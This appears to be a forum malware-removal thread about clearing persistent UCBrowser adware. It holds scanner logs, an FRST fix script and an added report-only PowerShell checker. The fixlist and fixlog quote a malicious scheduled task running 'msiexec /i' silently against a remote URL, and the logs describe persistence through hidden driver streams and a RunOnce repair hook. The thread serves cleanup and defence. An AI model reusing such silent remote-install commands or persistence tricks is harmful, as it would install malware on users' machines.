
Infected with tenacious PUPs and self-installing Adware



#1 Pfoertner


Posted 11 February 2017 - 03:11 PM

Hello Community. My name is Vinc and I have the following problem: A friend told me about a certain software and sent me a link - I trusted this connection, turned off my Windows Defender and security system, and then: got overrun by malicious stuff.

 

I could manage to get rid of most of the stuff, but according to a couple of anti-malware programs (RogueKiller, AdwCleaner and Emsisoft Emergency) there is still malware left. They sometimes show me more, sometimes fewer infections. Those programs find the malware and tell me they deleted it - but next time it's still there.

 

Malwarebytes ADWcleaner detects: ucdrv

Roguekiller detects: (log under the post)

 

My Firefox browser is for sure infected - Adblock doesn't work anymore, even after refreshing the browser and reinstalling the plug-ins. The other failure: From time to time there's a small Windows command window opening for a very, very short moment. I can just catch a glimpse of it before it disappears. I have no other visible dysfunctions, but I am kind of afraid of those intruders on my computer - before I got the help from the anti-malware programs the whole thing was a big mess (Malwarebytes found 600 malicious files when I ran it first). Had lots of Chinese stuff on my desktop and like 342908 pop-ups.

 

And most important: Thank you for doing this great job and helping people. Super cool thing to do :)

 

The FRST logs are attached.

 

Best regards!

 

Vinc

 

 

 

Rogue Killer report:

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/11/2017 20:49:46 (Duration : 00:17:04)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 2 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty|VT.Unknown MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

 


 


#2 nasdaq


Posted 12 February 2017 - 10:43 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click OK.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

ShellExecuteHooks: Kein Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} -  -> Keine Datei
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
S2 Numicultthges; C:\Program Files (x86)\Grihersmiritain\BbyManager.dll [X]
R1 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ACHTUNG
S3 ALSysIO; \??\C:\Users\V\AppData\Local\Temp\ALSysIO64.sys [X] <==== ACHTUNG
Task: {BF875A08-49D5-4DC9-A86A-F0742383D7F8} - System32\Tasks\Jernury => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-22V0TT0_WD-WXL1E54FMAU2FMAU2&v=201729 /q
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
AlternateDataStreams: C:\Windows\system32\drivers:x86 [1213218]

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Please execute the RogueKiller tool and delete everything that will be found.
Also if Malwarebytes finds anything remove all.
===

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox
<<<>>>

Please let me know what problem persists with this computer.

#3 Pfoertner


Posted 12 February 2017 - 04:06 PM

AdwCleaner log:
 
# AdwCleaner v6.043 - Logfile created 12/02/2017 at 22:02:22
# Updated on 27/01/2017 by Malwarebytes
# Database : 2017-02-12.1 [Server]
# Operating System : Windows 8.1  (X64)
# Username : V - LÄPPES
# Running from : C:\Users\V\Downloads\adwcleaner_6.043.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: ucdrv


***** [ Folders ] *****



***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****



***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [16492 Bytes] - [09/02/2017 21:09:41]
C:\AdwCleaner\AdwCleaner[C10].txt - [2786 Bytes] - [12/02/2017 20:55:24]
C:\AdwCleaner\AdwCleaner[C11].txt - [915 Bytes] - [12/02/2017 22:02:22]
C:\AdwCleaner\AdwCleaner[C2].txt - [1246 Bytes] - [09/02/2017 21:16:33]
C:\AdwCleaner\AdwCleaner[C3].txt - [1363 Bytes] - [09/02/2017 21:22:51]
C:\AdwCleaner\AdwCleaner[C4].txt - [1539 Bytes] - [09/02/2017 21:30:42]
C:\AdwCleaner\AdwCleaner[C5].txt - [2436 Bytes] - [09/02/2017 21:59:19]
C:\AdwCleaner\AdwCleaner[C6].txt - [2684 Bytes] - [09/02/2017 22:50:54]
C:\AdwCleaner\AdwCleaner[C7].txt - [2066 Bytes] - [10/02/2017 00:54:40]
C:\AdwCleaner\AdwCleaner[C8].txt - [2252 Bytes] - [10/02/2017 11:14:29]
C:\AdwCleaner\AdwCleaner[C9].txt - [2723 Bytes] - [10/02/2017 21:00:23]
C:\AdwCleaner\AdwCleaner[S0].txt - [15083 Bytes] - [09/02/2017 21:08:52]
C:\AdwCleaner\AdwCleaner[S10].txt - [3143 Bytes] - [10/02/2017 20:59:54]
C:\AdwCleaner\AdwCleaner[S11].txt - [2935 Bytes] - [10/02/2017 21:56:58]
C:\AdwCleaner\AdwCleaner[S12].txt - [3009 Bytes] - [11/02/2017 20:52:20]
C:\AdwCleaner\AdwCleaner[S13].txt - [3083 Bytes] - [11/02/2017 21:03:44]
C:\AdwCleaner\AdwCleaner[S14].txt - [2985 Bytes] - [11/02/2017 21:07:54]
C:\AdwCleaner\AdwCleaner[S15].txt - [3059 Bytes] - [12/02/2017 18:03:36]
C:\AdwCleaner\AdwCleaner[S16].txt - [3033 Bytes] - [12/02/2017 22:02:07]
C:\AdwCleaner\AdwCleaner[S1].txt - [1499 Bytes] - [09/02/2017 21:16:10]
C:\AdwCleaner\AdwCleaner[S2].txt - [1659 Bytes] - [09/02/2017 21:22:33]
C:\AdwCleaner\AdwCleaner[S3].txt - [1791 Bytes] - [09/02/2017 21:29:32]
C:\AdwCleaner\AdwCleaner[S4].txt - [2787 Bytes] - [09/02/2017 21:50:49]
C:\AdwCleaner\AdwCleaner[S5].txt - [2879 Bytes] - [09/02/2017 22:05:45]
C:\AdwCleaner\AdwCleaner[S6].txt - [2992 Bytes] - [09/02/2017 22:50:42]
C:\AdwCleaner\AdwCleaner[S7].txt - [2321 Bytes] - [10/02/2017 00:54:21]
C:\AdwCleaner\AdwCleaner[S8].txt - [2394 Bytes] - [10/02/2017 11:13:32]
C:\AdwCleaner\AdwCleaner[S9].txt - [2540 Bytes] - [10/02/2017 11:22:37]

########## EOF - C:\AdwCleaner\AdwCleaner[C11].txt - [2821 Bytes] ##########
 
 
FRST FIXLOG

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von V (12-02-2017 21:39:37) Run:1
Gestartet von C:\Users\V\Desktop\first
Geladene Profile: V (Verfügbare Profile: V)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

ShellExecuteHooks: Kein Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} -  -> Keine Datei
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
S2 Numicultthges; C:\Program Files (x86)\Grihersmiritain\BbyManager.dll [X]
R1 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ACHTUNG
S3 ALSysIO; \??\C:\Users\V\AppData\Local\Temp\ALSysIO64.sys [X] <==== ACHTUNG
Task: {BF875A08-49D5-4DC9-A86A-F0742383D7F8} - System32\Tasks\Jernury => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-22V0TT0_WD-WXL1E54FMAU2FMAU2&v=201729 /q
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
AlternateDataStreams: C:\Windows\system32\drivers:x86 [1213218]

End
*****************

Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => Schlüssel nicht gefunden.
C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\Numicultthges => Schlüssel erfolgreich entfernt
Numicultthges => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ucdrv => Schlüssel erfolgreich entfernt
ucdrv => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ALSysIO => Schlüssel erfolgreich entfernt
ALSysIO => Dienst erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BF875A08-49D5-4DC9-A86A-F0742383D7F8} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BF875A08-49D5-4DC9-A86A-F0742383D7F8} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\Jernury => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Jernury => Schlüssel erfolgreich entfernt
C:\Windows\system32\drivers => ":ucdrv-x64.sys" ADS konnte nicht entfernt werden.
C:\Windows\system32\drivers => ":x64" ADS konnte nicht entfernt werden.
C:\Windows\system32\drivers => ":x86" ADS konnte nicht entfernt werden.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15202523 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 26928345 B
Edge => 0 B
Chrome => 103424 B
Firefox => 390297386 B
Opera => 3401440 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 405058 B
NetworkService => 163608 B
V => 11633500 B

RecycleBin => 161211437 B
EmptyTemp: => 589.1 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 21:39:55 ====



#4 nasdaq


Posted 13 February 2017 - 08:17 AM

Please let me know what problem persists with this computer.

#5 Pfoertner


Posted 14 February 2017 - 10:31 AM

Hello nasdaq!

 

RogueKiller still finds adware. Here are the logfiles!

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/14/2017 16:07:27 (Duration : 00:14:49)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 3 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | ucdrv_repair : "C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair [x] -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: Intenso Speed Line USB Device +++++
--- User ---
[MBR] 3790524b1efbf2b8d3231f58edf75294
[BSP] 33f57e43fc374c847ac869b9340e0664 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 128 | Size: 15236 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
 


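The logs so far all point at one persistence pattern: a driver stored as an alternate data stream on the drivers directory itself, a service whose ImagePath names that stream, a RepairCommand value on the service key, and a RunOnce value (ucdrv_repair) that re-launches uclauncher.exe --repair at the next logon, which is why deleting the service alone does not hold. The PowerShell below is an added example for reviewing such a machine; it is not from the thread and not part of RogueKiller, FRST or SystemLook, the function names are mine, and it only reports, it removes nothing.

```powershell
# Added example (not from the thread). Run from an elevated PowerShell prompt
# (PowerShell 3.0 or later; the -Stream parameter needs it). Paths and value
# names are the ones that appear in the RogueKiller, FRST and SystemLook logs.

function Get-DirectoryAds {
    param([string]$Path = "$env:SystemRoot\System32\drivers")
    # Directories can carry named streams just like files. A plain directory
    # has no data streams at all, so anything listed here deserves a look.
    Get-Item -LiteralPath $Path -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object {
            [pscustomobject]@{
                Path   = $Path
                Stream = $_.Stream     # e.g. ucdrv-x64.sys, x64, x86 in the logs above
                Bytes  = $_.Length
            }
        }
}

function Get-SuspectServiceEntries {
    # Two things the logs show under HKLM\SYSTEM\CurrentControlSet\Services\ucdrv:
    # an ImagePath of the form <directory>:<stream> and a RepairCommand value.
    # Either is reported for review; a false positive costs a look, not a reboot.
    Get-ChildItem -LiteralPath 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $props = Get-ItemProperty -LiteralPath $_.PSPath -ErrorAction SilentlyContinue
            if (-not $props) { return }     # skip keys this account cannot read
            $image = [string]$props.ImagePath
            # Drop surrounding quotes, an NT "\??\" prefix and the drive-letter
            # colon; any colon that is still left names a stream, not a file.
            $rest = ($image.Trim('"') -replace '^(\\\?\?\\)?[A-Za-z]:', '')
            $adsPath = $rest -match ':'
            $repair = [string]$props.RepairCommand
            if ($adsPath -or $repair) {
                $reason = if ($adsPath) { 'ImagePath names a stream' } else { 'RepairCommand present' }
                [pscustomobject]@{
                    Service       = $_.PSChildName
                    ImagePath     = $image
                    RepairCommand = $repair
                    Reason        = $reason
                }
            }
        }
}

function Get-RunOnceEntries {
    # RunOnce values run at the next logon and are deleted afterwards, so a
    # scan between logons can miss them; list all of them for both hives.
    foreach ($hive in 'HKLM:', 'HKCU:') {
        $key = "$hive\Software\Microsoft\Windows\CurrentVersion\RunOnce"
        $props = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        $props.PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |   # drop PSPath & friends
            ForEach-Object {
                [pscustomobject]@{ Key = $key; Name = $_.Name; Command = $_.Value }
            }
    }
}

# Report only. Once the service key, RepairCommand and RunOnce entry are
# confirmed gone, a stream can be dropped with
#   Remove-Item -LiteralPath <directory> -Stream <name>
# Removing the stream first is what the Fixlog above shows failing, because
# the loaded driver still holds it open and the repair hook puts it back.
Get-DirectoryAds          | Format-Table -AutoSize
Get-SuspectServiceEntries | Format-Table -AutoSize
Get-RunOnceEntries        | Format-Table -AutoSize
```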

#6 nasdaq


Posted 14 February 2017 - 10:37 AM

Run the tool again and remove everything.


Let me know what problem persists.

#7 Pfoertner


Posted 14 February 2017 - 11:36 AM

After restarting and running the tool again - same stuff found.

 

RogueKiller Logs:

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/14/2017 17:01:58 (Duration : 00:14:27)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 2 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: Intenso Speed Line USB Device +++++
--- User ---
[MBR] 3790524b1efbf2b8d3231f58edf75294
[BSP] 33f57e43fc374c847ac869b9340e0664 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 128 | Size: 15236 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
 



#8 nasdaq


Posted 14 February 2017 - 02:00 PM

Download and run this tool.
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe to run it.
  • Copy and paste the content of the following bold text into the main textfield:
    :regfind
    UCBrowser
    ucdrv_repair
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.
===


#9 Pfoertner


Posted 14 February 2017 - 02:04 PM

I deleted the malware again with RogueKiller. Did the scan afterwards.

 

Here are the logs!

 

Thank you for your help!!!

 

SystemLook 30.07.11 by jpshortstuff
Log created at 20:02 on 14/02/2017 by V
Administrator - Elevation successful

========== regfind ==========

Searching for "UCBrowser"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
@="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0283&subsys_1025091b&rev_1000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\singlelineouttopo/00010001|\Device\HarddiskVolume6\Program Files (x86)\UCBrowser\Application\UCBrowser.exe%b{00000000-0000-0000-0000-000000000000}"
[HKEY_CURRENT_USER\Software\UCBrowser]
[HKEY_CURRENT_USER\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_CURRENT_USER\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_CURRENT_USER\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\Capabilities]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\Capabilities\Startmenu]
"StartMenuInternet"="UCBrowser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ReinstallCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"HideIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ShowIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
"UCBrowser"="Software\Clients\StartMenuInternet\UCBrowser\Capabilities"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\MediaPlayer\ShimInclusionList\UCBrowser.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\Capabilities]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\Capabilities\Startmenu]
"StartMenuInternet"="UCBrowser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ReinstallCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"HideIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ShowIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RegisteredApplications]
"UCBrowser"="Software\Clients\StartMenuInternet\UCBrowser\Capabilities"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ucdrv]
"RepairCommand"=""C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ucdrv]
"RepairCommand"=""C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair"
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\http\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\http\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\https\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\https\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,1"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\shell\open\command]
